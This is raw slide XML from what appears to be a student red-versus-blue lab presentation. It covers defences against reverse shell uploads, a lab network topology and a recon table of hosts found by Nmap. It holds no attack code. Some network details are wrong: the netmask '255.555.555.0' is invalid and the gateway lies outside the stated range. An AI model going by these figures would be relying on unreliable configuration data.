              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Input trusted IP addresses</a:t>
            </a:r>
            <a:endParaRPr sz="10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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p7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40" name="Google Shape;1240;p74"/>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kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Alert if invalid file types are uploaded to the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Alert on any traffic that is not expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Alert if any port is open</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>The alarm should trigger if any POST or forbidden file type is uploaded</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1473132"/>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configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>All file uploads from outside the company’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>interntal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> network should be blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Store uploaded files in a location not accessible from the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Manage user privileges </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Have all files run through an antivirus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Have file types validated when posting to the server and block all executable files</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Having file validation, we can prevent extension spoofing that hides the file type and with blocking executable file types we can prevent further reverse shells from working</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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5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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p5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8" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900759" y="910475"/>
            <a:ext cx="2032731" cy="3784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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Netmask: 255.555.555.0</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Gateway: 10.0.0.1</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sz="1100" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: Kali</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IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: ELK</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IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: Capstone</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IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: ML-REFVM-684427</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
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>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45B68FD0-71DB-055F-3663-CC2CE29B1D62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC91FD3-5B3B-968B-3219-D05DC7C80EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="72362" y="708018"/>
            <a:ext cx="6828397" cy="418971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pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Google Shape;1065;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6" name="Google Shape;1066;p5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a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="102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a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p5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5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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p5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marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p5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076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996883596"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{39E8A0B8-D548-4F6C-8B6F-CEB10D1B410B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="403225">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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hyper-V Azure Host Machine</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Red vs Blue – </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ML – REFVM - 684427</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US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Cloud Based Host Machine for the 3 VM’s</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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</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US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacking Machine used for Penetration Testing</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793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</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US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Network Monitoring Machine  Running Kibana – Logs data from Capstone VM</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r h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</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US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Target Machine Replicating a vulnerable server</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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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83" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595105393"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="1006803"/>
          <a:ext cx="8362500" cy="3997868"/>
        </p:xfrm>
        <a:graphic>
